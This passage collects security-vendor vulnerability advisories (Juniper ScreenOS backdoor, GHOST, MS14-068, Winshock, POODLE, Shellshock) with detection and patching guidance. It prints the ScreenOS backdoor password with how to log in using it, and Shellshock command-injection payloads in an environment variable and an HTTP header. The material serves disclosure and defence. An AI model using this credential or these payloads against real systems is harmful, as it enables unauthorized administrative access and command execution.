The infections which have been occurring lead vSOC to believe these are not necessarily targeted attacks, rather the infection vectors are exploited automatically by the Eternal Blue exploit kit against vulnerable systems within the enterprise.

References:

Juniper ScreenOS Vulnerabilities Advisory for CVE-2015-7755 and CVE-2015-7756

Overview

Juniper issued a critical security bulletin on Friday December 18, 2015, stating that two distinct critical vulnerabilities were discovered during an ‘internal code review’. These vulnerabilities affect devices running ScreenOS 6.2.0r15 through 6.2.0r18 and 6.3.0r12 through 6.3.0r20, the Operating System that runs its popular NetScreen firewalls, which are widely used by organizations as a Next Generation Firewall and to provide VPN access.   The first vulnerability, CVE-2015-7755, allows an attacker to obtain unauthorized administrative remote access to the firewall. The second vulnerability, CVE-2015-7756, may allow an attacker to decrypt VPN traffic. Based on the versions impacted, these vulnerabilities have likely been in these products since late 2012.

On Sunday, December 20, 2015, Rapid7’s HD Moore released a blog post that identified an extra strcmp call in the vulnerable ScreenOS versions with an argument of <<< %s(un=’%s’) = %u, which is the backdoor password. This password allows an attacker to bypass authentication through SSH and Telnet, provided that they have a valid username.  According to Moore, if you want to test this issue on your Juniper devices, Telnet or SSH to a NetScreen device, specify a valid username and the backdoor password. If the device is vulnerable, you will receive an interactive shell with the highest privileges.

Impact

Because these vulnerabilities have the potential to provide administrative access to tens of thousands of devices that sit on the perimeter of organizations’ networks, as well as provide attackers with the ability to read encrypted traffic, their impact should be considered Critical and vulnerable systems should be patched immediately.

Identification

Unfortunately, identifying whether or not the authentication bypass vulnerability has been exploited in your network is non-trivial, given that any attacker who accessed the backdoor would also have privileges to delete the logs. However, Juniper did provide guidance on identifying a successful exploit. If your organization is leveraging a centralized logging solution or SIEM, you should be able to review the logs for potential intrusions.

GuidePoint is also advising our customers to look for consistent and persistent traffic originating from unfamiliar and atypical IP address ranges that could represent the attackers moving inside your network once they’ve gained access to the appliance. Additionally, Fox-IT has released a set of Snort rules that can detect access with the backdoor password over Telnet and detect any connection to a ScreenOS Telnet or SSH service.

https://gist.github.com/fox-srt/ca94b350f2a91bd8ed3f

Even worse, Juniper stated that there is currently no way to detect if the vulnerability that allows an attacker to decrypt VPN traffic has been exploited.

Remediation

Juniper has released updated versions of all impacted ScreenOS versions and GuidePoint is advising customer’s to upgrade any impacted devices as soon as possible. According to Juniper, “the following software releases have been updated to resolve these specific issues: ScreenOS 6.2.0r19, 6.3.0r21, and all subsequent releases. Additionally, earlier affected releases of ScreenOS 6.3.0 have been respun to resolve these issues. Fixes are included in: 6.3.0r12b, 6.3.0r13b, 6.3.0r14b, 6.3.0r15b, 6.3.0r16b, 6.3.0r17b, 6.3.0r18b, 6.3.0r19b. Finally, Juniper is recommending that customers restrict management access to only trusted management networks and hosts to limit the attack surface for the authentication bypass flaw.
GuidePoint Security is available to assist our customers with any remediation efforts. Please contact your Account Executive or click here for more details on how GuidePoint can help.

About GuidePoint Security

GuidePoint Security LLC provides customized, innovative and valuable information security solutions and proven cyber security expertise that enable commercial and federal organizations to successfully achieve their security and business goals. By embracing new technologies, GuidePoint Security helps clients recognize the threats, understand the solutions, and mitigate the risks present in their evolving IT environments. Headquartered in Herndon, Virginia, GuidePoint Security is a small business, and classification can be found with the System for Award Management (SAM). Learn more at: www.guidepointsecurity.com.

How New Technology Can Help Federal Agencies Comply With National Insider Threat Policies

Various motives, such as greed, blackmail and revenge, have influenced federal employees and federal contractors to commit some of the most serious security breaches in the history of the United States.

While many thousands of them are dedicated to their jobs and are loyal to their country, a select few federal employees have revealed top secrets to other countries, organizations, and to the public. (Think Edward Snowden and Bradley Manning.)

Other insiders continue to pose a major threat to national security today.

Current National Security Directives

In November 2012, the National Insider Threat Policy and Minimum Standards for Executive Branch Insider Threat Programs required that federal agencies, departments and divisions:

  • Monitor employee use of classified networks
  • Protect the civil liberties and privacy of all personnel
  • Have their own insider threat programs in place
  • Appoint a program leader (U.S. citizen with appropriate clearance)
  • Maintain quality HR records (i.e. personnel, polygraph tests, security)
  • Provide insider threat awareness training within 30 days of hiring

The 2012 regulations not only cover what security measures must be taken, they also address how they must be implemented.

In early 2015, an updated policy is expected to result in additional regulations, causing concern for some federal organizations in the race to maintain national security compliance.

Advanced Technology for Greater National Security

Fortunately for federal organizations and businesses that employ federal contractors, today’s innovative technology solutions make it possible to achieve the country’s security objectives.

Identification

In order to identify threatening activity throughout networks and systems, federal agencies must develop and implement the appropriate security strategies.

For example, statistically analyzing network flows (NetFlow), utilizing network-based security tools, and implementing next generation firewalls can help the security operation centers (SOCs) determine and counter security issues.

These methods can tell an agency what type of data is being extracted, when irregular data usage is occurring, and what typical data trends and activities are used for regular operations.

Remediation

To satisfy national rules and regulations, as well as to create an internal network security alarm system, federal organizations can use the following technologies, services, and tools:

SPAN/TAP Port Aggregation

Switch aggregators allow devices from several networks to be connected to the switch aggregator, thereby sending SPAN/TAP to a number of devices. This will assist in the management and distribution of uninterrupted data flow to a centralized switch aggregator.

SPAN/TAP Data Enrichment

The spanning or tapping of network data allows for the placement of NetFlow sensors and can assist with the NetFlow data as well as application and user identification.

Packet Capture

With full packet capture, the capabilities of an agency or business to detect and respond to potential breaches can drastically increase. Being able to identify the compromised data and the person infiltrating greatly assists cyber security and forensic officials in their investigations.

Next Generation Firewalls

Next generation firewalls provide additional information and extra layers of protection to federal organizations. They can identify IP addresses, service ports and users, as well as determine when the user is logged in to the domain.

Among the many ways next generation firewalls can be used to combat insider threats are application identification and control, file blocking and botnet detection.

Most importantly, next generation firewalls help administrators quickly access captured data logs and generate meaningful, correlated reports.

These tools are only a small sample of the technologies that can help prevent and/or minimize insider threats and satisfy the new national security mandates.

For more information about insider threats, how to mitigate them download our new, Finding the Insider Threat, white paper here: www.guidepointsecurity.com/white-papers/.

About GuidePoint Security

GuidePoint Security, LLC provides customized, innovative and valuable information security solutions and proven cyber security expertise that enable commercial and federal organizations to successfully achieve their security and business goals. By embracing new technologies, GuidePoint Security helps clients recognize the threats, understand the solutions, and mitigate the risks present in their evolving IT environments. Headquartered in Reston, Va., and with offices in Michigan, New Hampshire, Florida and North Carolina. GuidePoint Security is a small business, and classification can be found with the System for Award Management (SAM).

Another “Ghost” in the Machine

Introduction

A recent vulnerability disclosure from a group of Qualys researchers reaffirms that there is no rest for the weary and that the New Year will likely keep pace with the former as the first critical and highly publicized vulnerability of 2015 is unveiled. This vulnerability is being referred to as “Ghost” and technical news sources around the world are rushing to report on the impact. These reports have been consistently accompanied with ominous imagery of ghoulish figures and fear-inspiring phrases, but is this Ghost really as scary as the media has portrayed?

Overview – A “Ghost” of GNU Past

This vulnerability is a heap-based buffer overflow vulnerability that can be trigged when a malformed string is passed to the gethostbyname() or gethostbyname2() functions in the GNU C Library (glibc). These vulnerable functions have been present in the glibc library for nearly 15 years.

The origin of the vulnerability in each of these functions is a “hostname” variable. While the implicated code does perform some input validation on the string value stored in this variable, no bounds checking is performed. Due to this implementation flaw, an attacker can supply malformed input consisting of an excessive number of numerical digits and period characters to write to unintended portions of system memory. This type of memory access can potentially be leveraged to execute unauthenticated and unauthorized code on remote systems. The full technical details of this vulnerability can be found in the original disclosure thread from the OSS-Sec mailing list.

Impact – How Scary is Ghost?

The impact of this vulnerability, if exploited, is very high (as is always the case with remote code execution vulnerabilities). Additionally, many services on Linux systems leverage these vulnerable libraries, which would make them potential candidates for a variety of attack vectors.

However, the exploitability of this vulnerability requires highly specific circumstances that make actual exploitation in the wild extremely unlikely. This is due to multiple mitigating factors that were all addressed at length in the original disclosure. These mitigating factors were listed as follows:

  • A patch already exists (since May 21, 2013), and has been applied and tested since glibc-2.18, released on August 12, 2013;
  • The gethostbyname*() functions are obsolete; with the advent of IPv6, recent applications use getaddrinfo() instead;
  • Many programs, especially locally accessible SUID binaries, use gethostbyname() if, and only if, a preliminary call to inet_aton() fails. However, a subsequent call must also succeed (the “inet-aton” requirement) in order to reach the overflow: this is impossible, and such programs are therefore safe; and
  • Most of the other programs, especially remotely accessible servers, use gethostbyname() to perform forward-confirmed reverse DNS (FCrDNS, also known as full-circle reverse DNS) checks. These programs are generally safe because the hostname passed to gethostbyname() has normally been pre-validated by DNS software:
    • “A string of labels each containing up to 63 8-bit octets, separated by dots, and with a maximum total of 255 octets,” makes it impossible to satisfy the “1 KB” requirement; and
    • While glibc’s DNS resolver can produce hostnames of up to (almost) 1025 characters (in the case of bit-string labels and special or non-printable characters), this action introduces backslash characters (“\\”) and makes it impossible to satisfy the “digits-and-dots” requirement.

Despite the Qualys analysts’ disclosure of these highly restrictive conditions, the fear-mongering media has repeatedly omitted these details. Such periodicals consistently fixate upon the theoretical impact of this vulnerability but neglect to report on the real-world implications.

In the past year, the security industry has witnessed an emerging trend of vulnerability disclosures that come packaged with clever names and graphical imagery (Heartbleed, ShellShock, POODLE, etc.). This trend simply seems to be the result of an effort to drive media exposure. Although this practice does increase the public’s attention to information security concerns, it also increases the frequency of widespread reports that lack complete and/or accurate technical details from news sources that are solely concerned with exaggerating the facts for profit.

Consequently, there has also been a consistent increase in the spread of misinformation, flawed assumptions, technical inaccuracies, and unwarranted hysteria. Such trends have resulted in serious real-world issues, like ShellShock and Heartbleed, being lumped together with pedantic and highly theoretical proof-of-concepts, like POODLE and GHOST. Rather than getting caught up in the media frenzy, it is important that industry professionals stop to consider the actual technical details and corresponding real-world impact of a vulnerability to ensure that a measured and appropriate response is provided.

The Final Verdict

No matter how obscure the circumstances must be for exploitation to be possible, the underlying code associated with these functions is still vulnerable and should be updated as a matter of best practice. The vulnerability is the consequence of sustained support for functions that have already been deprecated for some time. As such, remediation will eliminate the risks associated with Ghost (however unlikely), with little-to-no impact on existing services or applications.

Identification

Under normal circumstances, the vulnerable library would only be found on Linux systems and not Windows workstations or servers. This is because GNU libraries are native to Linux, and the glibc library specifically is standard on Linux distributions. Therefore, all Linux systems are potentially vulnerable.

The easiest way to determine if a given Linux system is vulnerable is to identify the version of glibc in use on the system. Unpatched versions of glibc, prior to glibc-2.18, are vulnerable and should be updated. In most cases, a simple terminal command can be used to identify the version that’s in use. Note: in each example below, the command is in blue, and the identified version is in red.

  • Use the following command with Ubuntu and Debian:
# ldd --version
ldd (Ubuntu EGLIBC 2.11.1-0ubuntu7.20) 2.11.1
  • Use the following command with CentOS and RedHat:
# rpm -q glibc 
glibc-2.12-1.149.el6_6.5.i686 

Determining if the library contains the vulnerable functions requires consideration of both the running version and the patch / minor-version. This is due to the fact that numerous patched versions of the glibc library prior to glibc-2.18 are no longer vulnerable. If the returned version predates the versions listed below, then the system is vulnerable and should be patched:

  • Ubuntu 12.04 LTS: 2.15-0ubuntu10.10
  • Ubuntu 10.04 LTS: 2.11.1-0ubuntu7.20
  • Debian 7 LTS: 2.13-38+deb7u7
  • CentOS 6: glibc-2.12-1.149.el6_6.5
  • CentOS 7: glibc-2.17-55.el7_0.5
  • RHEL 5: glibc-2.5-123.el5_11.1
  • RHEL 6: glibc-2.12-1.149.el6_6.5
  • RHEL 7: glibc-2.17-55.el7_0.5

Unless unique circumstances dictate otherwise, GuidePoint recommends updating to the latest stable version, regardless of the current running version.

Remediation

To update to the latest version of glibc (whether for mitigation or general hardening), a single update command should be run from the terminal, and then the system will need to be rebooted for the change to take affect.

  • Use the following command with Ubuntu and Debian:
# sudo apt-get update && sudo apt-get dist-upgrade 
# sudo reboot

Warning: Upgrading the distribution can result in significant changes, so be sure to plan according. 

  • Use the following command with CentOS and RedHat:
# sudo yum update glibc 
# sudo reboot

About GuidePoint Security

GuidePoint Security, LLC provides customized, innovative and valuable information security solutions and proven cyber security expertise that enable commercial and federal organizations to successfully achieve their security and business goals. By embracing new technologies, GuidePoint Security helps clients recognize the threats, understand the solutions, and mitigate the risks present in their evolving IT environments. Headquartered in Reston, Virginia, and with offices in Michigan, New Hampshire, Florida and North Carolina, GuidePoint Security is a small business, and classification can be found with the System for Award Management (SAM). Learn more at: www.guidepointsecurity.com.

Your Golden Ticket to Domain Admin – Microsoft’s Critical Kerberos Vulnerability – MS14-068

Overview

Microsoft issued a critical security bulletin on Tuesday November 18, 2014 (MS14-068) which stated there was a privately reported vulnerability found within the Kerberos Key Distribution Center (KDC) that could allow privilege escalation. The KDC authenticates clients and users, and issues session tickets and temporary session keys to users and computers within an Active Directory environment. The vulnerability exists in implementations of the KDC in Microsoft Windows and exists due to the KDC failing to properly validate signatures, which can result in forged parameters within a Kerberos ticket.

The KDC is a network service that runs on each Domain Controller as part of Active Directory Domain Services (AD DS) and by default listens on TCP and UDP port 88. Attackers that have access to a compromised domain user account as well as access to AD DS within an Active Directory environment could leverage the KDC vulnerability remotely. It would then be possible to elevate the privileges of the compromised user account to the role of Domain Administrator by sending the KDC a forged Kerberos ticket that identifies the user as a Domain Administrator. Once an attacker gains Domain Administrator privileges within an Active Directory environment they will be able to compromise any domain-managed system in the environment.

Impact

Unlike local privilege escalation vulnerabilities, an attacker that has a valid unprivileged user account within the domain can leverage this vulnerability remotely. Microsoft additionally stated within the security bulletin they are aware of limited targeted attacks that have attempted to exploit this vulnerability. Thus, it is reasonable to assume there is code in the wild that Microsoft has seen attempting to exploit this vulnerability. GuidePoint has not yet discovered enough information to exploit the vulnerability.

Affected Operating Systems

  • Windows Server 2003 and higher
  • Windows Server 2008 and higher
  • Windows Server 2012 and higher

For a complete list of affected hosts please refer to the MS14-068 Security Bulletin. In addition, Microsoft has released patches for Windows Vista, Windows 7, and Windows 8 and 8.1 as a defense-in-depth hardening of these operating systems. However, the Windows Vista, Windows 7, and Windows 8 and 8.1 operating systems are not directly vulnerable to this vulnerability.

Identification

Pre-Update Detection

To identify if an Active Directory environment has been targeted by any known exploits before updates have been applied to the affected systems, review Windows Security Event Log for Event ID 4624. This event is logged when successful logins occur within a domain. If the ‘Security ID’ and ‘Account Name’ fields of the log do not match, even though they should, it could indicate targeted attacks leveraging this vulnerability are underway.

Joe Bialek from the Microsoft Security Research and Defense blog illustrates pre-update detection very well within his detailed write-up of the MS14-068 vulnerability titled “Additional Information About CVE-2014-6324”. For additional information and illustration of pre-update detection it is highly recommended to read this blog post.

Post-Update Detection

To identify if an Active Directory environment is being actively targeted after applying the update to Windows Server 2008R2 and above, Event ID 4769 in the Kerberos Service Ticket Operation event log can be used for detection purposes.

Joe Bialek’s also illustrates post-update detection very well within his detailed write-up of the MS14-068 vulnerability titled “Additional Information About CVE-2014-6324”. Bialek explains event 4769 is a high volume event and it is advisable to only log failures of this event for detection purposes. For additional information and illustration of pre-update detection it is highly recommended to read this blog post.

Remediation

Microsoft has released an out-of-band patch to remediate the MS14-068 vulnerability. Users should test and deploy the patch to affected systems domain wide. Please refer to the MS14-068 Security Bulletin for more information.

References

A Shock 19 Years in the Making – Microsoft’s Critical WinShock Vulnerability – MS14-066

Overview

The vulnerability defined in MS14-066 (CVE-2014-6321), or “Winshock” as the media has dubbed it, has been categorized as a critical risk due to the potential impact that includes denial-of-service, information disclosure, and unauthenticated remote code execution. Microsoft describes Winshock in KB2992611 as the “improper processing of specially crafted packets by the Secure Channel (SChannel) security package.” This package is closely linked to critical system services, and this condition creates the possibility for a remote, unauthenticated attacker to obtain SYSTEM-level access. That is, undoubtedly, the worst-case scenario which could plausibly become the precursor to worms and other widespread damage.

 Impact

At its heart, the SChannel package is responsible for securing network communications with the SSL and TLS protocols. Numerous Microsoft service implementations including (but not limited to) IIS, Active Directory, Outlook Web Access, the Remote Desktop Protocol, and Internet Explorer utilize the SChannel package. However, due to the immediate lack of detailed technical information, it is currently unclear which of these services may genuinely be affected by this vulnerability.

For a detailed explanation on how to exploit the vulnerability, refer to the in-depth technical blog post by Beyond Trust that analyzes the patch and demonstrates how specially crafted SSL communications can be leveraged to target the vulnerable code and crash the operating system. The demonstration proves that not only is remote code execution theoretically possible, but that a simple denial of service condition is easily achieved by making a minor code change to the open source OpenSSL library.

It is important to note that the default IIS configuration does not accept client certificates. Additionally, other SSL/TLS-enabled services, such as Terminal Services, do not support client certificate configurations. However, new research demonstrates that (thanks to a second “bug” in Schannel) a malicious client certificate can still be utilized to trigger the vulnerability simply by configuring the attack technique to ignore the server configuration and submit the client certificate. While the service itself would ultimately ignore the client certificate in such a scenario, it will still be analyzed by the vulnerable SChannel code. In this case, any SSL/TLS service that utilizes the SChannel package, which includes all native Windows services, is conceivably vulnerable to exploitation.

At the moment, there are no publicly accessible exploits, nor have there been any reported cases of exploitation in the wild. However, Immunity Inc. has released a proof-of-concept exploit for subscribers that have access to their CANVAS Early Updates program. While the quality and reliability of this proof-of-concept are not disclosed, its existence confirms the feasibility of exploitation.

The technique demonstrated by Beyond Trust utilized client certificates to reach the vulnerable code. It is worth noting that Winshock appeared to address multiple code flaws, so client certificates should not be considered to be the only and definitive attack vector at this time. While a client certificate-based vulnerability would lack the prevalence of other recent SSL/TLS vulnerabilities, such as Heartbleed and POODLE, defending services affected by Winshock could arguably be a higher priority.

Identification

At this time there is no definitive way to determine if systems are vulnerable to Winshock. Anexia-it released a script that tests for the presence of four (4) ciphers that will exist on a system that has been patched against Winshock. This test, however, is not a guaranteed way to determine a system’s status in regards to Winshock. Microsoft includes a list of impacted Operating Systems (“OS”) in their MS14-066 advisory. If a system in your environment runs on an OS listed in the advisory, it would be safe to assume the system is vulnerable and proceed with mitigation steps to prevent system exploitation.

Remediation

Patching for Winshock is a largely straightforward task, and public-facing servers should obviously be prioritized due to their increased exposure. However, there are significant concerns that should be considered before applying the Microsoft supplied patch. The most common concern is the potential for negatively impacted performance.

Various well-known vendors, such as Amazon, Blackberry and IBM, have reported noticeable application performance degradation, TLS session disconnections, and SQL server performance issues. Reports of performance problems extending to client applications, such as web browsers, have surfaced as well.

Microsoft has been largely silent on these issues, and the lack of guidance makes remediation all the more problematic. On the one hand, this is a critical system vulnerability that should ideally be patched post haste, but on the other, the patch may immediately harm the organization in an alternate manner.

Before installing the patch from Microsoft, GuidePoint highly recommends carefully examining your environment to determine if installing the patch is worth the potential risk of performance degradation, and to prepare a rollback strategy should problems arise after installation.

Intermediary security controls and alternate SSL/TLS configurations may provide an ideal, short-term solution for some organizations. GuidePoint recommends contacting your inline network and host-based security control vendors to determine whether signatures have been developed to block attacks prior to reaching the vulnerable service.

Additionally, Non-Windows SSL/TLS proxy servers and offloading appliances may prevent attacks from succeeding against the underlying Windows service, but these configurations should be thoroughly tested to ensure that malicious requests are properly dropped or modified and cannot be used to successfully exploit the service.

 

POODLE: SSL 3.0 Fallback Vulnerability

Overview

The SSL version 3.0 POODLE (Padding Oracle On Downgraded Legacy Encryption) vulnerability (CVE-2014-3566) was officially released on October 14, 2014 by OpenSSL. The flaw was disclosed by a team of Google researchers including Bodo Möller, Thai Duong, and Krzysztof Kotowicz. This vulnerability is a consequence of an implementation flaw associated with the use of block cipher encryption in SSLv3. Block ciphers encrypt data in fixed-length blocks. If the plain text value to be encrypted is not a multiple of the defined block size, the cipher will apply padding to the data to increase the size, so that it can be converted to cipher text. The concern is that the Message Authentication Code (MAC) does not cover the block cipher padding and when the message is decrypted, the integrity of the padding cannot be verified. This can allow an attacker to decrypt cipher text, one byte at a time.

This vulnerability only affects the SSLv3 protocol, which is rarely used by modern web browsers that prefer the usage of TLSv1 encryption. However, due to the widespread support for SSLv3 on both servers and web browsers, an attacker can still leverage this vulnerability by using it in conjunction with a downgrade attack. A downgrade attack could be accomplished by intercepting and manipulating traffic associated with the SSL/TLS cipher suite negotiation, conducted between the client and server.

In the original disclosure article, B.Möller, T. Duong, and K. Kotowicz succinctly illustrate the impact of this vulnerability, referencing a scenario in which it could be used to compromise secure session tokens within the context of a web application (p.2, https://www.openssl.org/~bodo/ssl-poodle.pdf).

“In the web setting, this SSL 3.0 weakness can be exploited by a man-in-the-middle attacker to decrypt “secure” HTTP cookies, using techniques from the BEAST attack [BEAST]. To launch the POODLE attack (Padding Oracle On Downgraded Legacy Encryption), run a JavaScript agent on evil.com (or on http://example.com) to get the victim’s browser to send cookie-bearing HTTPS requests to https://example.com, and intercept and modify the SSL records sent by the browser in such a way that there’s a non-negligible chance that example.com will accept the modified record. If the modified record is accepted, the attacker can decrypt one byte of the cookies.”

An attacker could inject the JavaScript agent in a persistent or even reflected Cross-Site-Scripting (XSS) attack, or inject this code within the context of an established Man-in-the-Middle attack. This could be used to cause the victim’s browser to send the attacker cookie bearing HTTPS requests; which, in turn, can be modified and, if accepted by the server, could allow the attacker to decrypt the cookie, one byte at a time.

Impact

Due to the fact that this vulnerability must be exploited within a chosen-plaintext context, the only probable exploitation scenario with any significant impact is within a web context. For an attacker to successfully exploit this vulnerability, multiple highly specific conditions must exist. These conditions include the following:

  • The attacker must be able to intercept and manipulate traffic between the client and server (as in a Man-in-the-Middle scenario)
  • The attacker must be able to execute custom JavaScript code to initiate multiple crafted requests within the context of the victim’s browser

Despite the special circumstances and high level of skill required to exploit this vulnerability, the impact of a successful attack would be significant. Successful exploitation could result in an attacker gaining access to small pieces of highly sensitive encrypted traffic such as session tokens. Acquisition of these session tokens could be used in session hijacking attacks to completely take over a victim’s session within the context of the web application.

Identification

Server Identification

Server Testing with OpenSSL Client:

To determine if a particular service is vulnerable, use the SSL client in SSLv3 mode and supply the server name or IP address in conjunction with the port number of the service in question. If the connection succeeds then SSLv3 is enabled:

Syntax:
openssl s_client -connect <server>:<port> -ssl3

Example:
openssl s_client -connect google.com:443 -ssl3

Server Testing with Nmap:

The SSL-enum Nmap Scripting Engine (NSE) script can also be used to determine if servers are vulnerable. Nmap should be executed with the syntax provided below:

Syntax:
nmap <server> –script ssl-enum-ciphers -p <port>

Example:
nmap google.com –script ssl-enum-ciphers -p 443

If the scan returns a list of support ciphers under the SSLv3 header, then SSLv3 is enabled.

SSLv3:
|     ciphers:
|       TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA – strong
|       TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA – strong
|       TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA – strong
|       TLS_ECDHE_RSA_WITH_RC4_128_SHA – strong
|       TLS_RSA_WITH_3DES_EDE_CBC_SHA – strong
|       TLS_RSA_WITH_AES_128_CBC_SHA – strong
|       TLS_RSA_WITH_AES_256_CBC_SHA – strong
|       TLS_RSA_WITH_CAMELLIA_128_CBC_SHA – strong
|       TLS_RSA_WITH_CAMELLIA_256_CBC_SHA – strong
|       TLS_RSA_WITH_RC4_128_MD5 – strong
|       TLS_RSA_WITH_RC4_128_SHA – strong
|     compressors:
|       NULL

Server Testing with SSLLabs:

Qualys has made a web-based testing utility available at the URL listed below. This can be used to test public facing servers.

https://www.ssllabs.com/ssltest

If the scan returns indication that there is still support for SSLv3, then the server is vulnerable.

poodle 1

Client Identification

Browser Client Testing with Poodle Test:

A web-based test has been constructed to test client browsers and determine if they are vulnerable to the POODLE attack.

https://www.poodletest.com/

If your browser is vulnerable, the site will display the following image:

poodle 2

Remediation

Unfortunately, there is no patch remediation for this vulnerability. However, SSLv3 is a depreciated protocol and should be disabled on both servers and clients (browsers). Further, both Mozilla and Google have posted that they will be updating both FireFox and Google Chrome, in the coming months, to disable SSLv3 support. However, it should be noted that disabling SSLv3 could potentially break some websites or legacy web applications that support SSLv3.

Browser Remediation

Remediation on Microsoft Internet Explorer:

Click the Settings button at the top-right corner of the browser, and then select ‘Internet Options’. Then browse to the ‘Advanced’ tab. In the Settings menu, scroll to the bottom and uncheck the box labeled ‘Use SSL 3.0’. Once completed, click ‘Apply’ then ‘OK’.
poodle 3

Remediation on Mozilla FireFox:

In the URL address bar, browse to ‘about:config’. You will then be given a warning, indicating that you should only modify these settings if you know what you are doing. We do, so click the button to disregard the warning and proceed. Then, in the Search bar, type ‘security.tls.version.min’. Double-click the setting with that Preference Name and then change the integer value from 0 to 1. Once this change has been made, click ‘OK’. This will disable SSLv2 and SSLv3, and only allow the browser to support TLSv1 and later.

poodle 4

Remediation on Google Chrome:

Ironically, despite the fact that it was a Google team that identified this vulnerability, Chrome’s GUI management interface offers no option to disable support for SSLv3. A common workaround is to start Chrome from a shortcut that leverages the command line argument to disable support for SSLv3.

To do this, right-click your Google Chrome shortcut and select ‘Properties’. Then, append the command line argument ‘ –ssl-version-min=tls1’ to the end of the value in the Target field (as seen in the provided image). Click ‘Apply’ and then ‘OK’. Once this modification has been made, support for any versions prior to TLSv1 is disabled anytime the browser is started from this Shortcut.

poodle 5

Server Remediation

Remediation on Apache Server:

Modify the SSLProtocol directive in the server’s ssl.conf file to disable support for versions earlier than TLSv1 on Apache. The location of this file may vary depending on the build of the server.

For Ubuntu, the file can be modified with:

sudo nano /etc/apache2/mods-available/ssl.conf

If mod-ssl is enabled, the location will be:

sudo nano /etc/apache2/mods-enabled/ssl.conf

For CentOS, the file can be modified with:

sudo nano /etc/httpd/conf.d/ssl.conf

In the configuration file, modify the SSLProtocol directive to include the following:

SSLProtocol All -SSLv2 -SSLv3

To verify the configuration change, use the following:

apachectl configtest

Once support for SSLv2 and SSLv3 has been disabled, the Apache service will need to be restarted. This can be done with the following command:

sudo service apache2 restart

Remediation on IIS:

To disable support for SSLv3 on Microsoft IIS, a registry tweak is required. Open the registry editor (with command ‘regedit’) and then browse to the following key:

HKey_Local_Machine\System\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\

Inside the Protocols key, there should be a key called ‘SSL 3.0’ and inside that key, there should be a key called ‘Server’. If these keys do not exist, create them. Then, inside the ‘Server’ key, create a DWORD value called ‘Enabled’ and then leave its value at 0 (default). Once completed, restart the server to implement the new changes.

poodle 6

Remediation on NGINX:

Modify the ssl_protocols directive in the nginx.conf file to disable support for versions earlier than TLSv1 on Nginx. This file is located at /etc/nginx/nginx.conf and can be modified with:

sudo nano /etc/nginx/nginx.conf

Modify the ssl_protocols directive in the file to include the following:

ssl_protocols TLSv1 TLSv1.1 TLSv1.2;

To verify the configuration change, use the following:

sudo nginx -t

Once support for SSLv2 and SSLv3 has been disabled, the nginx service will need to be restarted. This can be done with the following command:

sudo service nginx restart

What is TLS_FALLBACK_SCSV?

In the event that you are not prepared to disable the use of SSLv3, downgrade attacks can be alternatively mitigated in some distinct scenarios by using a browser that supports a new cipher suite value called TLS_FALLBACK_SCSV. In the event that both the server and client browser support this option, a more secure negotiation process is used that prevents downgrading to a protocol or cipher that is less secure than the highest mutually supported option.

Unfortunately, at this time, limited support on the server-side and limited adoption by client browsers has made this an ineffective, comprehensive solution for this problem.

Presently, TLS_FALLBACK_SCSV is only supported by Google Chrome 33.0.1750 (February 2014 Build) and later. Other major web browsers will likely adopt support in the following months.

 References

About GuidePoint Security

GuidePoint Security, LLC provides customized, innovative and valuable information security solutions and proven cyber security expertise that enable commercial and federal organizations to successfully achieve their security and business goals. By embracing new technologies, GuidePoint Security helps clients recognize the threats, understand the solutions, and mitigate the risks present in their evolving IT environments. Headquartered in Reston, Virginia, and with offices in Michigan, New Hampshire, Florida and North Carolina, GuidePoint Security is a small business, and classification can be found with the System for Award Management (SAM). Learn more at: www.guidepointsecurity.com.

Shellshock – Security Technology Vendor Information

Based on the requests of our clients, as discussed in our previous blog post “How shocking is “Shellshock?” below is a list of security technology vendors whose solutions are susceptible to the Shellshock vulnerability. This list will be regularly updated to provide you with timely information on the security technology vendors that you rely on to protect your organization.

Last Updated: Wednesday, October 1, 2014 13:47 EDT

Vendor

How Shocking is ‘Shellshock’?

Overview

The Shellshock vulnerability is present in the Bourne Again Shell (Bash) versions up to and including 4.3. Bash is a popular command shell for Unix and Linux operating systems, and it is often the default shell for many platforms, including OSX.

The version of Bash can be easily be identified by using the bash –version command.

# bash --version
GNU bash, version 4.2.37(1)-release (i486-pc-linux-gnu)
Copyright (C) 2011 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This vulnerability is actually quite simple and easy to understand. Bash allows functions to be defined in environment variables and processes such functions when a session is initiated. However, the processing does not stop at the end of the function definition, like it should, but it instead continues to process subsequent commands in the string.

Consider the following environment variable. The blue text is a standard function definition, and the red text contains two additional commands. These commands will print (echo) the word “Vulnerable” to the screen, as well as print the id of the current user. Note that commands are separated by semicolons (“;”).

DEMO="() { ignored; }; echo Vulnerable; /usr/bin/id"

This environment variable can be defined using the export command.

# export DEMO="() { ignored; }; echo Vulnerable; /usr/bin/id"

This alone does not trigger the vulnerability. However, the env command can be used to list the environment variables and confirm that this new variable has indeed been defined.

# env
…snip…
USER=rootXDG_SESSION_PATH=/org/freedesktop/DisplayManager/Session0
XDG_SEAT_PATH=/org/freedesktop/DisplayManager/Seat0
SSH_AUTH_SOCK=/tmp/ssh-grryqvZSm99S/agent.3958
DEMO=() { ignored; }; echo Vulnerable; /usr/bin/id
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
DESKTOP_SESSION=LXDE
MAIL=/var/mail/root
PWD=/root
…snip…

Now, if a new Bash session is started, the word “Vulnerable” and the current user ID information are displayed, as expected.

# bash
Vulnerable
uid=0(root) gid=0(root) groups=0(root)

The primary attack vector for remote exploitation is currently Apache web servers that are hosting CGI applications. This is due to the fact that this configuration, as denoted in the CGI specification, allows environment variables to be created from user-controlled input. Several avenues for defining custom environment variables exist, but HTTP headers are the most straightforward.

The following example is a standard HTTP GET request that contains a custom header (Demo), which includes a function definition and additional id command.

GET /cgi-bin/test.cgi HTTP/1.1
Host: localhost
Accept-Encoding: identity
Demo: () { ignored;}; /usr/bin/id
Content-type: application/x-www-form-urlencoded

Submitting this request to a CGI script hosted by Apache creates the following environment variable.

HTTP_DEMO="() { ignored;}; /usr/bin/id"

Again, simply defining the environment variable does not result in automatic code execution. The underlying CGI script must meet specific conditions as well. Consider the following CGI script. This script simply executes the ifconfig command (which would display network interface information if returned to the user). This script is not vulnerable to attack.

#!/usr/bin/perl
print "Content-type: text/html\n\n";
exec('ifconfig');

However, the following script effectively executes the same command, but it first initiates a new Bash session. This script is therefore vulnerable.

